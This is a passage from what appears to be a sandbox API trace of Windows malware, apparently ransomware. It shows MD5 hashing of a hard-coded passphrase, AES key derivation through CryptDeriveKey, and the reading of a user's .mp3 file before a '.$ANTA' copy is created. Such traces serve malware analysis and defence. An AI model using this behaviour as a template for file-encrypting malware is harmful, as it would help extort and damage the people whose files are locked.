hHeap=0x1780000) returned 1 [0116.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0116.233] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0116.233] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0116.233] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0116.233] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0116.233] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.233] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0116.233] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.233] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0116.233] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cb048, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0116.234] CryptCreateHash (in: hProv=0x41a4d00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0116.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0116.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0116.234] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0116.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0116.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0116.234] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.234] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0116.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cadc0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0116.234] CryptHashData (hHash=0x41ac740, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0116.235] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.235] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0116.235] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0116.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb018, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0116.235] CryptDeriveKey (in: hProv=0x41a4d00, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac780) returned 1 [0116.235] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.235] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0116.235] CryptDestroyHash (hHash=0x41ac740) returned 1 [0116.235] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\HkFnDV.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\hkfndv.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0116.236] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.236] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0116.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0116.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0116.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0116.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0116.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0116.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0116.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0116.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0116.236] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0116.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0116.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0116.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0116.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8430 [0116.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4838 [0116.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a40c8 [0116.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0116.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4d88 [0116.239] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t")) returned 0x10 [0116.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4d88 | out: hHeap=0x1780000) returned 1 [0116.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a40c8 | out: hHeap=0x1780000) returned 1 [0116.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0116.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0116.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0116.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0116.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0116.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0116.240] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\HkFnDV.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\hkfndv.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0116.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0116.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0116.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0116.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0116.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0116.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0116.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.241] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0116.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0116.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0116.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0116.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0116.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0116.241] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0116.241] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0116.241] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0116.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0116.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0116.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0116.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0116.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0116.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0116.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0116.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0116.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0116.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0116.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0116.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e09020 [0116.245] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0116.246] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144e820*=0x10000, lpOverlapped=0x0) returned 1 [0116.249] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144e820*=0x7256, lpOverlapped=0x0) returned 1 [0116.250] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0116.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0116.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0116.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0116.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17256) returned 0x4516010 [0116.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e09020 | out: hHeap=0x1780000) returned 1 [0116.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0116.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0116.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0116.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0116.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17256) returned 0x452d270 [0116.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0116.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.307] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0116.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0116.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0116.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0116.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17256) returned 0x4516010 [0116.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0116.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0116.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0116.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0116.316] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0116.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0116.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0116.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0116.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0116.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0116.318] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0116.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0116.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0116.320] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0116.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0116.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0116.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27b0 [0116.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0116.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0116.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0116.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17256) returned 0x4516010 [0116.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2810 [0116.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0116.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0116.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2910 [0116.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0116.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0116.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2730 [0116.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0116.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0116.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0116.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab38 [0116.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0116.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0116.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0116.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0116.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0116.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17256) returned 0x499a008 [0116.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0116.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0116.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0116.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0116.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0116.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0116.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0116.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0116.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) 